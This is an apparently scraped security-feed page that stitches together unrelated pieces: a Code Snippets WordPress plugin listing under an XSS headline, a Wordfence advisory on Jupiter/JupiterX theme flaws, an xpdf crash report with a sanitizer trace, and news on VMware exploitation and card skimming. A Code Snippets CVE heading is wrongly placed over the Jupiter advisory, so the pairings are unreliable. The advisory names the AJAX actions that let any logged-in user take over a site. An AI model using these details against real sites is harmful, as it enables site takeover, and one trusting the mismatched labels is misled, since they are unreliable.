Reflected Cross-Site Scripting (XSS) vulnerability in Code Snippets plugin <= 2.14.3 at WordPress via &orderby vulnerable parameter.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Code Snippets is an easy, clean and simple way to run code snippets on your site. It removes the need to add custom snippets to your theme’s functions.php file.

A snippet is a small chunk of PHP code that you can use to extend the functionality of a WordPress-powered website; essentially a mini-plugin with less load on your site.  
Most snippet-hosting sites tell you to add snippet code to your active theme’s functions.php file, which can get rather long and messy after a while.  
Code Snippets changes that by providing a GUI interface for adding snippets and **actually running them on your site** just as if they were in your theme’s functions.php file.

Code Snippets provides graphical interface, similar to the Plugins menu, for managing snippets. Snippets can be activated and deactivated, just like plugins. The snippet editor includes fields for a name, a visual editor-enabled description, tags to allow you to categorize snippets, and a full-featured code editor. Snippets can be exported for transfer to another site, either in JSON for later importing by the Code Snippets plugin, or in PHP for creating your own plugin or theme.

If you have any feedback, issues, or suggestions for improvements please leave a topic in the Support Forum, or join the community on Facebook.

If you like this plugin, or it is useful to you in some way, please consider reviewing it on WordPress.org.

If you’d like to contribute to the plugin’s code or translate it into another language, you can fork the plugin on GitHub.

**Translations**

Code Snippets can be used in these different languages thanks to the following translators:

*   Belarusian – Hrank.com
*   Brazilian Portuguese – Bruno Borges
*   Chinese – Jincheng Shan and 诗语
*   Chinese (Taiwan) – Alex Lion and Chun-Chih Cheng
*   Croatian – Borisa Djuraskovic from Web Hosting Hub
*   Czech – Lukáš Tesař and Jakub Humpolec
*   Danish – Finn Sommer Jensen
*   Dutch – Sander Spies, Peter Smits and mother.of.code.a11n
*   English (New Zealand) and English (UK) – webaware
*   English (South Africa) – webaware and Ian Barnes
*   French – momo-fr, Didier Demory, Cyrille Sanson and Shea Bunge
*   French (Canada) – Dominic Desbiens
*   German – Mario Siegmann, Joerg Knoerchen, David Decker and Andreas
*   Greek – Konstantinos Megas and Toni Bishop from Jrop
*   Indonesian – Jordan Silaen from ChameleonJohn.com
*   Italian – Usman Wagan, Luisa Ravelli and ElectricFeet
*   Japanese – mt8, Takakazu Nagaya, Naoko Takano and melvas
*   Persian – Mohammad Novintanon
*   Russian – Alexander Samsonov, Yui, Denis Yanchevskiy and krioteh
*   Slovak – Ján Fajčák
*   Spanish (Colombia) and Spanish (Ecuador) – Javier Esteban
*   Spanish (Spain) – Ibidem Group, Javier Esteban, Fernando Tellado and Juanma Aranda
*   Spanish (Venezuela) – Yordan Soares
*   Swedish – Argentum, Fredrik and Tor-Bjorn Fjellner
*   Urdu – Samuel Badree
*   Vietnamese – Tuan Phan

**Automatic installation**

1.  Log into your WordPress admin
2.  Click **Plugins**
3.  Click **Add New**
4.  Search for **Code Snippets**
5.  Click **Install Now** under “Code Snippets”
6.  Activate the plugin

**Manual installation**

1.  Download the plugin
2.  Extract the contents of the zip file
3.  Upload the contents of the zip file to the wp-content/plugins/ folder of your WordPress installation
4.  Activate the Code Snippets plugin from ‘Plugins’ page.

Network Activating Code Snippets through the Network Dashboard will enable a special interface for running snippets across the entire network.

A full list of our Frequently Asked Questions can be found at help.codesnippets.pro.

**How can I recover my site if it is crashed by a buggy snippet?**

You can recover your site by enabling the Code Snippets safe mode feature. Instructions for how to turn it on are available here: https://help.codesnippets.pro/article/12-safe-mode.

**Will I lose my snippets if I change the theme or upgrade WordPress?**

No, the snippets are stored in the WordPress database, independent of the theme and unaffected by WordPress upgrades.

**Can the plugin be completely uninstalled?**

If you enable the ‘Complete Uninstall’ option on the plugin settings page, Code Snippets will clean up all of its data when deleted through the WordPress ‘Plugins’ menu. This includes all stored snippets. If you would like to preserve the snippets, ensure they are exported first.

**Can I copy snippets that I have created to another WordPress site?**

Yes! You can individually export a single snippet using the link below the snippet name on the ‘Manage Snippets’ page or bulk export multiple snippets using the ‘Bulk Actions’ feature. Snippets can later be imported using the ‘Import Snippets’ page by uploading the export file.

**Can I export my snippets to PHP for a site where I’m not using the Code Snippets plugin?**

Yes. Click the checkboxes next to the snippets you want to export, and then choose **Export to PHP** from the Bulk Actions menu and click Apply. The generated PHP file will contain the exported snippets’ code, as well as their name and description in comments.

**Can I run network-wide snippets on a multisite installation?**

You can run snippets across an entire multisite network by **Network Activating** Code Snippets through the Network Dashboard. You can also activate Code Snippets just on the main site, and then individually on other sites of your choice.

**Where are the snippets stored in my WordPress database?**

Snippets are stored in the wp_snippets table in the WordPress database. The table name may differ depending on what your table prefix is set to.

**Where can I go for help or suggest new features?**

You can get help with Code Snippets, report bugs or errors, and suggest new features and improvements either on the WordPress Support Forums or on GitHub

**How can I help contribute to the development of the Code Snippets plugin?**

The best way to do this is to fork the repository on GitHub and send a pull request.

Works perfectly, and safely

Un plugin sencillo, efectivo y limpio. Gracias.

Hi, Firstly it works very well as it is expected. The only thing I did’nt find is how register a new label. As I write a new label it is not registered Thanks a lot for the job

I've been using this plugin for years and I really like its features. Yes, you can disable your site very easily by injecting PHP code, but that is not the fault of the plugin; with great power comes great responsibility.

Read all 366 reviews

“Code Snippets” is open source software. The following people have contributed to this plugin.

Contributors

**3.1.0 (17 May 2022)**

*   Fixed: Caching inconsistencies preventing snippets and settings from refreshing on sites with persistent object caching.
*   Improved: Simplified database queries.
*   Added: More comprehensive cache coverage, including for active snippets.
*   Added: Icon to ‘Go Pro’ button indicating it opens an external tab.
*   Improved: Allow display styles in snippet descriptions.

**3.0.1 (14 May 2022)**

*   Fixed: Incompatibility issue with earlier versions of PHP.

**3.0.0 (14 May 2022)**

**Added**

*   Added: HTML content snippets for displaying as shortcodes or including in the page head or footer area.
*   Added: Notice reminding users to upgrade unsupported PHP versions.
*   Added: Visual settings to add attributes to shortcodes.
*   Added: Shortcode buttons to the post and page content editors.
*   Added: Basic REST API endpoints.
*   Added: Snippet type column to the snippets table.
*   Added: Snippet type badges to Edit and Add New Snippet pages.
*   Added: Setting to control whether the current line of the code editor is highlighted.
*   Added: Display a warning when saving a snippet with missing title or code.
*   Added: Add suffix to title of cloned snippets.

**Changed**

*   Improved: Updated plugin code to use namespaces, preventing name collisions with other plugins.
*   Improved: Added key for the ‘active’ and ‘scope’ database table columns to speed up queries.
*   Improved: Redirect from edit menu if not editing a valid snippet.
*   Improved: Moved activation switch into its own table column.
*   Improved: Updated code documentation according to WordPress standards.
*   Improved: Added snippet type labels to the tabs on the Snippets page.
*   Improved: Split settings page into tabs.
*   Improved: Use the version of CodeMirror included with WordPress where possible to inherit the additional built-in features.
*   Improved: Added hover effect to priority settings in the snippets table to show that they are editable.
*   Fixed: Snippets table layout on smaller screens.

**Deprecated**

*   Removed: Deprecated functions and compatibility code for unsupported PHP versions.
*   Removed: Option to disable snippet scopes.

**New in Pro**

*   Added: CSS style snippets for the site front-end and admin area.
*   Added: JavaScript snippets for the site head and body area on the front-end.
*   Added: Browser cache versioning for CSS and JavaScript snippets.
*   Added: Support for exporting and downloading CSS and JavaScript snippets.
*   Added: Support for highlighting code on the front-end.
*   Added: Editor syntax highlighting for CSS, JavaScript and HTML snippets.
*   Added: Button to preview full file when editing CSS or JavaScript snippets.
*   Added: Option to minify CSS and JavaScript snippets.
*   Added: Gutenberg editor block for displaying content snippets.
*   Added: Gutenberg editor block for displaying snippet source code.
*   Added: Elementor widget for displaying content snippets.
*   Added: Elementor widget for displaying snippet source code.

**2.14.6 (13 May 2022)**

*   Fixed: Issue with processing uploaded import files.
*   Fixed: Issue with processing tag filters.

**2.14.5 (10 May 2022)**

*   Fixed: Incompatibility issue with older versions of PHP.

**2.14.4 (5 May 2022)**

*   Fixed: Prevent array key errors when loading the snippet table with unknown order values.

**2.14.3 (10 Dec 2021)**

*   Fixed: Potential security issue outputting snippets-safe-mode query variable value as-is. Thanks to Krzysztof Zając for reporting.

**2.14.2 (9 Sep 2021)**

*   Fixed: Prevent network snippets table from being created on single-site installs.
*   Added translations:
    *   Spanish by Ibidem Group
    *   Urdu by Samuel Badree
    *   Greek by Toni Bishop from Jrop
*   Added: Support for :class syntax to the code validator.
*   Added: PHP8 support to the code linter.
*   Added: Color picker feature to the code editor.
*   Added: Failsafe to prevent multiple versions of Code Snippets from running simultaneously.

**2.14.1 (10 Mar 2021)**

*   Added: Czech translation by Lukáš Tesař.
*   Fixed: Code validator now supports function_exists and class_exists checks.
*   Fixed: Code validator now supports anonymous functions.
*   Fixed: Issue with saving the hidden columns setting.
*   Fixed: Replaced the outdated tag-it library with tagger for powering the snippet tags editor.
*   Added: Code direction setting for RTL users.
*   Updated CodeMirror to version 5.59.4.
*   Added: Additional action hooks and search API thanks to @Spreeuw.

**2.14.0 (26 Jan 2020)**

*   Updated CodeMirror to version 5.50.2.
*   Added: Basic error checking for duplicate functions and classes.
*   Updated Italian translations to fix display issues – thanks to Francesco Marino.
*   Fixed: Ordering snippets in the table by name will now be case-insensitive.
*   Added: Additional API options for retrieving snippets.
*   Fixed: Code editor will now properly highlight embedded HTML, CSS and JavaScript code.
*   Changed the indicator color for inactive snippets from red to grey.
*   Fixed a bug preventing the editor theme from being set to default.
*   Added: Store the time and date when each snippet was last modified.
*   Added: Basic error checking when activating snippets.
*   Fixed: Ensure that imported snippets are always inactive.
*   Fixed: Check the referer on the import menu to prevent CSRF attacks. Thanks to Chloe with the Wordfence Threat Intelligence team for reporting.
*   Fixed: Ensure that individual snippet action links use proper verification.

**2.13.3 (13 Mar 2019)**

*   Added: Hover effect to activation switches.
*   Added: Additional save buttons above snippet editor.
*   Added: List save keyboard shortcuts to the help tooltip.
*   Added: Change “no items found” message when search filters match nothing.
*   Fixed: Calling deprecated code in database upgrade process.
*   Fixed: Include snippet priority in export files.
*   Fixed: Use Unix newlines in code export file.
*   Updated CodeMirror to version 5.44.0.
*   Fixed: Correctly register snippet tables with WordPress to prevent database repair errors \[#\]
*   Fixed: CodeMirror indentation settings being applied incorrectly

**2.13.2 (25 Jan 2019)**

*   Removed potentially problematic cursor position saving feature

**2.13.1 (22 Jan 2019)**

*   Added: Add menu buttons to settings page for compact menu
*   Updated: French translation updated thanks to momo-fr
*   Fixed: Split code editor and tag editor scripts into their own files to prevent dependency errors
*   Fixed: Handling of single-use shared network snippets
*   Fixed: Minor translation template issues
*   Added: Help tooltop to snippet editor for keyboard shortcuts, thanks to Michael DeWitt
*   Improved: Added button for executing single-use snippets to snippets table
*   Added: Sample snippet for ordering snippets table by name by default
*   Updated CodeMirror to version 5.43.0

**2.13.0 (17 Dec 2018)**

*   Added: Search/replace functionality to the snippet editor. See here for a list of keyboard shortcuts. \[#\]
*   Updated CodeMirror to version 5.42.0
*   Added: Option to make admin menu more compact
*   Fixed: Problem clearing recently active snippet list
*   Improved: Integration between plugin and the CodeMirror library, to prevent collisions
*   Improved: Added additional styles to editor settings preview
*   Added: PHP linter to code editor
*   Improved: Use external scripts instead of inline scripts
*   Fixed: Missing functionality for ‘Auto Close Brackets’ and ‘Highlight Selection Matches’ settings

**2.12.1 (15 Nov 2018)**

*   Improved: CodeMirror updated to version 5.41.0
*   Improved: Attempt to create database columns that might be missing after a table upgrade
*   Improved: Streamlined upgrade process
*   Fixed: Interface layout on sites using right-to-left languages
*   Improved: Made search box appear at top of page on mobile \[#\]
*   Updated screenshots

**2.12.0 (23 Sep 2018)**

*   Fixed: Prevented hidden columns setting from reverting to default
*   Improved: Updated import page to improve usability
*   Improved: Added Import button next to page title on manage page
*   Improved: Added coloured banner indicating whether a snippet is active when editing
*   Update CodeMirror to 5.40.0

**2.11.0 (24 Jul 2018)**

*   Added: Ability to assign a priority to snippets, to determine the order in which they are executed
*   Improvement: The editor cursor position will be preserved when saving a snippet
*   Added: Pressing Ctrl/Cmd + S while writing a snippet will save it
*   Added: Shadow opening PHP tag above the code editor
*   Improved: Updated the message shown when there are no snippets
*   Added: Install sample snippets when the plugin is installed
*   Improved: Show all available tags when selecting the tag field
*   Added: Filter hook for controlling the default list table view
*   Added: Action for cloning snippets

**The full changelog is available on GitHub**

CVE-2022-25617: Code Snippets

Jupiter Theme versions 6.10.1 and below as well as JupiterX Core plugin versions 2.0.7 and below suffer from privilege escalation and post deletion vulnerabilities. JupiterX Theme versions 2.0.6 and below as well as JupiterX Core versions 2.0.6 and below suffer from plugin deactivation and setting modification flaws. JupiterX Theme versions 2.0.6 and below as well as Jupiter Theme versions 6.10.1 and below suffer from path traversal and local file inclusion vulnerabilities. Jupiter Theme versions 6.10.1 and below suffer from an arbitrary plugin deletion vulnerability. JupiterX Core plugin versions 2.0.6 and below suffer from information disclosure, modification, and denial of service vulnerabilities.

Description: Authenticated Privilege Escalation and Post deletion

Affected Software: Jupiter Theme and JupiterX Core Plugin

Slug(s): jupiter (theme), jupiterx-core(plugin)

Developer: ArtBees

Affected Versions: Jupiter Theme <= 6.10.1 and JupiterX Core Plugin <= 2.0.7

CVE ID: CVE-2022-1654

CVSS score: 9.9 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Researcher(s): Ramuel Gall

Fully Patched Versions: Jupiter Theme 6.10.2 and JupiterX Core Plugin 2.0.8

This vulnerability allows any authenticated attacker, including a subscriber or customer-level attacker, to gain administrative privileges and completely take over any site running either the Jupiter Theme or JupiterX Core Plugin. The JupiterX Core plugin is required for the JupiterX theme.

The classic Jupiter Theme contains a function, uninstallTemplate, which is intended to reset a site after a template is uninstalled, but has the additional effect of elevating the user calling the function to an administrator role. In JupiterX, this functionality has been migrated to the JupiterX Core plugin. Vulnerable versions register AJAX actions but do not perform any capability checks or nonce checks.

On a site with a vulnerable version of the Jupiter Theme installed, any logged-in user can elevate their privileges to those of an administrator by sending an AJAX request with the action parameter set to abb_uninstall_template.

This calls the uninstallTemplate function, which calls the resetWordpressDatabase function, where the site is effectively reinstalled with the currently logged-in user as the new site owner.

On a site where a vulnerable version of the JupiterX Core plugin is installed, the same functionality can also be accessed by sending an AJAX request with the action parameter set to jupiterx_core_cp_uninstall_template.

Description: Insufficient Access Control leading to Authenticated Arbitrary Plugin Deactivation and Settings Modification

Affected Software: JupiterX Theme and JupiterX Core Plugin

Slug(s): jupiterx (theme), jupiterx-core(plugin)

Developer: ArtBees

Affected Versions: JupiterX Theme <= 2.0.6 and JupiterX Core <= 2.0.6

CVE ID: CVE-2022-1656

CVSS score: 6.5 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Researcher(s): Ramuel Gall

Fully Patched Versions: JupiterX Theme 2.0.7 and JupiterX Core Plugin 2.0.7

This vulnerability allows an attacker to reduce site security or damage functionality.

Vulnerable versions of the JupiterX Theme allow any logged-in user, including subscriber-level users, to access any of the functions registered in lib/api/api/ajax.php, which also grant access to the jupiterx_api_ajax_ actions registered by the JupiterX Core Plugin. This includes the ability to deactivate arbitrary plugins as well as update the theme’s API key.

Description: Authenticated Path Traversal and Local File Inclusion

Affected Software: JupiterX Theme and Jupiter Theme

Slug(s): jupiterx (theme), jupiter(theme)

Developer: ArtBees

Affected Versions: JupiterX Theme <= 2.0.6 and Jupiter Theme <= 6.10.1

CVE ID: CVE-2022-1657

CVSS score: 8.1 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Researcher(s): Ramuel Gall

Fully Patched Versions: JupiterX Theme 2.0.7 and Jupiter Theme 6.10.2

This vulnerability could allow an attacker to obtain privileged information, such as nonce values, or perform restricted actions, by including and executing files from any location on the site.

Vulnerable versions of the Jupiter and JupiterX Themes allow logged-in users, including subscriber-level users, to perform Path Traversal and Local File inclusion.

In the JupiterX theme, the jupiterx_cp_load_pane_action AJAX action present in the lib/admin/control-panel/control-panel.php file calls the load_control_panel_pane function. It is possible to use this action to include any local PHP file via the slug parameter.

The Jupiter theme has a nearly identical vulnerability which can be exploited via the mka_cp_load_pane_action AJAX action present in the framework/admin/control-panel/logic/functions.php file, which calls the mka_cp_load_pane_action function.

Description: Insufficient Access Control leading to Authenticated Arbitrary Plugin Deletion

Affected Software: Jupiter Theme

Slug(s): jupiter (theme)

Developer: ArtBees

Affected Versions: Jupiter Theme <= 6.10.1

CVE ID: CVE-2022-1658

CVSS score: 6.5 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Researcher(s): Ramuel Gall

Fully Patched Versions: Jupiter Theme 6.10.2

This vulnerability allows an attacker to reduce site security or damage functionality.

Vulnerable versions of the Jupiter Theme allow arbitrary plugin deletion by any authenticated user, including users with the subscriber role, via the abb_remove_plugin AJAX action registered in the framework/admin/control-panel/logic/plugin-management.php file.

Using this functionality, any logged-in user can delete any installed plugin on the site.

Description: Information Disclosure, Modification, and Denial of Service

Affected Software: JupiterX Core Plugin

Slug(s): jupiterx-core (plugin)

Developer: ArtBees

Affected Versions: JupiterX Core Plugin <= 2.0.6

CVE ID: CVE-2022-1659

CVSS score: 6.3 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Researcher(s): Ramuel Gall

Fully Patched Versions: JupiterX Core Plugin 2.0.7

This vulnerability allows an attacker to view site configuration and logged-in users, modify post conditions, or perform a denial of service attack.

Vulnerable versions of the JupiterX Core plugin register an AJAX action jupiterx_conditional_manager which can be used to call any function in the includes/condition/class-condition-manager.php file by sending the desired function to call in the sub_action parameter.

Timeline

April 5, 2022 - The Wordfence Threat Intelligence team finishes our investigation of the Jupiter and JupiterX Themes. We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers. We contact the theme developer and send over the full disclosure.

April 28, 2022 - A partially patched version of the JupiterX theme and JupiterX Core plugin is released.

May 3, 2022 - We follow up with the theme developer about additional patches and notify them of an additional vulnerability we found in the Jupiter Theme.

May 4, 2022 - Firewall rule becomes available to Wordfence free users.

May 10, 2022 - Fully Patched versions of the Jupiter Theme and JupiterX Core plugin are released. We verify that all vulnerabilities are addressed.

Conclusion

In today’s article, we covered a number of vulnerabilities present in the Jupiter and JupiterX themes and the JupiterX Core companion plugin. The most severe vulnerability allows any logged-in user to easily gain administrator privileges.

Wordfence Premium, Wordfence Care, and Wordfence Response customers have been protected from these vulnerabilities since April 5, 2022, and free Wordfence users received the same protection on May 4, 2022.

We strongly recommend updating to the latest versions of the impacted themes and plugins available immediately.

Since several versions across several slugs are impacted, we’ll reiterate what you should update:

If you are running the Jupiter Theme version 6.10.1 or below, you should immediately update to version 6.10.2 or higher.

If you are running the JupiterX Theme version 2.0.6 or below, you should immediately update to version 2.0.7 or higher.

If you are running the JupiterX Core Plugin version 2.0.7 or below, you should immediately update it to version 2.0.8 or higher.

If you know anyone using the Jupiter theme or the JupiterX theme, we urge you to forward this advisory to them as the most severe vulnerability allows complete site takeover.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Jupiter / JupiterX Theme Privilege Escalation / LFI / DoS / Access Control Issues

There is a Null Pointer Dereference vulnerability in the XFAScanner::scanNode() function in XFAScanner.cc in xpdf 4.03.

A NULL pointer dereference in the GString::getCString function in GString.h in xpdf-4.03 dirrerent viewtopic.php?f=3&t=41241&p=41808&hilit ... ing#p41808.

Code: Select all

    
    ./pdftops 'null_point.pdf'
    
    
    Syntax Error (92917): Command token too long
    Syntax Error (93045): Command token too long
    Syntax Error (93173): Command token too long
    Syntax Error: Couldn't read xref table
    Syntax Warning: PDF file is damaged - attempting to reconstruct xref table...
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==15006==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x55780e688f11 bp 0x7fff1cac0d50 sp 0x7fff1cac0d40 T0)
    ==15006==The signal is caused by a READ memory access.
    ==15006==Hint: address points to the zero page.
        #0 0x55780e688f10 in GString::getCString() /home/luna/test/xpdf/xpdf-4.03/goo/GString.h:83
        #1 0x55780e669d32 in XFAScanner::getFieldValue(ZxElement*, GString*, GString*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:349
        #2 0x55780e669bd1 in XFAScanner::scanField(ZxElement*, GString*, GString*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:333
        #3 0x55780e6698a7 in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:296
        #4 0x55780e669a1c in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:309
        #5 0x55780e669a1c in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:309
        #6 0x55780e669a1c in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:309
        #7 0x55780e66849f in XFAScanner::load(Object*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:139
        #8 0x55780e4ce1d9 in AcroForm::load(PDFDoc*, Catalog*, Object*) /home/luna/test/xpdf/xpdf-4.03/xpdf/AcroForm.cc:352
        #9 0x55780e4f034d in Catalog::Catalog(PDFDoc*) /home/luna/test/xpdf/xpdf-4.03/xpdf/Catalog.cc:234
        #10 0x55780e6276a4 in PDFDoc::setup2(GString*, GString*, int) /home/luna/test/xpdf/xpdf-4.03/xpdf/PDFDoc.cc:318
        #11 0x55780e627268 in PDFDoc::setup(GString*, GString*) /home/luna/test/xpdf/xpdf-4.03/xpdf/PDFDoc.cc:276
        #12 0x55780e626c5d in PDFDoc::PDFDoc(char*, GString*, GString*, PDFCore*) /home/luna/test/xpdf/xpdf-4.03/xpdf/PDFDoc.cc:218
        #13 0x55780e4cd7fa in main /home/luna/test/xpdf/xpdf-4.03/xpdf/pdftops.cc:309
        #14 0x7f7fae9130b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #15 0x55780e49106d in _start (/home/luna/test/xpdf/xpdf-4.03/build/xpdf/pdftops+0x14106d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/luna/test/xpdf/xpdf-4.03/goo/GString.h:83 in GString::getCString()
    ==15006==ABORTING

CVE-2021-27548: xpdf 4.03 bug in pdftops

Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.

Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.

Recently reported VMware bugs are being used by hackers who are focused on using them to deliver Mirai denial-of-service malware and exploit the Log4Shell vulnerability.

Security researchers at Barracuda discovered that attempts were made to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960, both reported last month.

“Barracuda researchers analyzed the attacks and payloads detected by Barracuda systems between April to May and found a steady stream of attempts to exploit two recently uncovered VMware vulnerabilities: CVE-2022-22954 and CVE-2022-22960” reported by Barracuda.

VMware published an advisory on April 6, 2022, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954 with a CVSS score of 9.8, the bug allows an attacker with network access to perform remote code execution via server-side template injection on VMware Workspace ONE Access and Identity Manager Solutions.

The other bug involved CVE-2022-22960 (CVSS score 7.8), is a local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to the advisory by VMware, the bug arises due to improper permission in support scripts allowing an attacker with local access to gain root privileges.

The VMware Workspace One is an intelligent-drive workspace platform that helps to manage any app on any device in a secure and simpler manner. The Identity manager handles the authentication to the platform and vRealize Automation is a DevOps-based infrastructure management platform for config of IT resources and automating the delivery of container-based applications.

****Exploitation Occurred After PoC Release****

The Barracuda researchers noted that the previous flaws are chained together for a potential full exploitation vector.

After the bug was disclosed by VMware in April, a proof-of-concept (PoC) was released on Github and shared via Twitter.

“Barracuda researchers started seeing probes and exploit attempts for this vulnerability soon after the release of the advisory and the initial release of the proof of concept on GitHub,” reported Barracuda.

After the release of PoC, the spike in attempts is noticed by the researcher, they classified it as a probe rather than actual attempts to exploit.

“The attacks have been consistent over time, barring a few spikes, and the vast majority of them are what would be classified as probes rather than actual exploit attempts,” they added.

The researchers at Barracuda also revealed that most of the exploit attempts are primarily from botnet operators, the IPs discovered still seem to host variants of the Mirai distributed-denial-of-service (DDoS) botnet malware, along with some Log4Shell exploits and low levels of EnemyBot (a type of DDoS botnet) attempts.

The majority of the attacks (76 percent) originated from the U.S. geographically, with most of them coming from data centers and cloud providers. The researcher added that there is a spike in IP addresses from the UK and Russia and about (6 percent) of the attacks emanate from these locations.

The researchers noted, “there are also consistent background attempts from known bad IPs in Russia.”

“Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes,” researchers explained

According to Barracuda “the interest levels on these vulnerabilities have stabilized” after the initial spike in April, the researcher expected to analyze low-level scanning and attempts for some time.

The best way to protect the systems is to apply the patches immediately, especially if the system is internet-facing, and to place a Web application firewall (WAF) in front of such systems “will add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell,” advised by Barracuda.

April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell

A critical VMware bug tracked as CVE-2022-22954 continues to draw cybercriminal moths to its remote code-execution flame, with recent attacks focused on botnets and Log4Shell.

Recently uncovered VMware vulnerabilities continue to anchor an ongoing wave of cyberattacks bent on dropping various payloads. In the latest spate of activity, nefarious types are going in with the ultimate goal of infecting targets with various botnets or establishing a backdoor via Log4Shell.

That's according to Barracuda researchers, who found that attackers are particularly probing for the critical vulnerability tracked as CVE-2022-22954 in droves, with swaths of actual exploitation attempts in the mix as well.

The security vulnerability carries a CVSS score of 9.8 and affects the VMware Workspace ONE Access and Identity Manager. Workspace ONE is VMware's platform for delivering corporate applications to any device (a sort of juiced-up mobile device management solution), and the identity manager handles authentication to the platform. The bug allows remote code execution (RCE) via server-side template injection for attackers that have network access.

"A server-side template-injection issue may allow an unauthenticated user with access to the Web interface to execute any arbitrary shell command as the VMware user," Mike Goldgof, Barracuda's senior director of product marketing for data protection, network, and application security, tells Dark Reading. "In effect, a hacker can bring down the system, extract data, inject ransomware, etc."

"Cybercriminals are constantly scanning for these types of advisories and jump on them ASAP to attempt to exploit targets before they get a chance to download a patch," Goldgof noted. "\[And\] VMware infrastructure is widely deployed in both data center and cloud environments, providing a large population of attractive hacking targets." 

The activity sometimes involves a second bug (CVE-2022-22960, CVSS score of 7.8), which is a local privilege escalation (LPE) vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation (a platform for creating private clouds). The bug arises because of improper permissions in support scripts, according to VMware's advisory, and could allow attackers with local access to achieve root privileges. 

In this case, it's being chained with the previous flaw for a full exploitation vector, Barracuda noted.

VMware disclosed the bugs in April, and soon thereafter, a proof-of-concept (PoC) exploit was released on GitHub and tweeted out to the world. Unsurprisingly, researchers from multiple security firms started seeing probes and exploit attempts very soon thereafter — and the hits just keep coming. 

"Any serious vulnerability in a broadly used platform or application is cause for concern. Threat actors are always looking for an opportunity to hit multiple targets with minimal effort," Mike Parkin, senior technical engineer at Vulcan Cyber, tells Dark Reading. "VMware is one of the most popular virtualization platforms around, and often runs on powerful iron with multiple applications running on top of it. This gives an attacker multiple reasons to go after VMware servers."

**VMware Payloads du Jour**  
Barracuda researchers noticed that most of the probing in its telemetry now is for the VMware RCE vulnerability, using the PoC code from GitHub. Most of the actual exploit attempts meanwhile are now primarily from botnet operators, especially IPs hosting variants of the Mirai distributed denial-of-service (DDoS) botnet malware, along with a few EnemyBot samples (another DDoS baddie).

Otherwise, "some Log4Shell exploit attempts were also seen in the data," researchers noted.

As for who's behind the attacks, most originate in the US (76%), mostly emanating from data centers and cloud providers. However, the researchers also found "consistent background attempts" from Russian IP addresses that are well known to be affiliated with opportunistic cybercrime cartels.

"Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes," the researchers explained.

In April, another set of attacks was flagged, with a very different aim. An Iranian cyber-espionage group known as Rocket Kitten was seen exploiting the CVE-2022-22954 RCE to deliver the Core Impact penetration testing tool on vulnerable systems. And in another batch of April activity, cryptominers reportedly made their way into the exploitation-palooza lineup.

After several initial spikes in April, the interest levels in triggering these vulnerabilities have been holding steady, according to Barracuda, and the firm expects the scanning and exploitation attempts to continue for some time.

The best defense against this spate of attacks (and most botnet and Log4Shell activity) is Security 101 — i.e., patching. Defenders can also build in an extra layer of protection with a Web application firewall (WAF), adding "defense in depth against zero-day attacks and other vulnerabilities," according to Barracuda's Tuesday writeup.

It's important for companies to hop on patches for popular platforms as soon as vendor disclosures come out, Goldgof notes.

"Cybercriminals are constantly scanning for these types of advisories and jump on them ASAP to attempt to exploit targets before they get a chance to download a patch," he says. "\[And\] VMware infrastructure is widely deployed in both data center and cloud environments, providing a large population of attractive hacking targets."

Critical VMware Bug Exploits Continue, as Botnet Operators Jump In

Law enforcement is warning about a wave of Web injection attacks on US online retailers that are successfully stealing credit-card information from online checkout pages.

Cyberattackers are targeting US online businesses by injecting malicious PHP code into e-commerce checkout pages and exfiltrating scraped data to a command-and-control (C2) server spoofed to look like a legitimate credit-card processor.

That's according to a flash alert from the FBI issued this week, which detailed one attack in particular that began in September 2020. Along with scraping credit-card data, the cybercriminals were modifying the business checkout page code to gain backdoor access to the business' system. The FBI provided indicators of compromise and recommended mitigations for similar e-tailers, including patching and ongoing monitoring of e-commerce environments. 

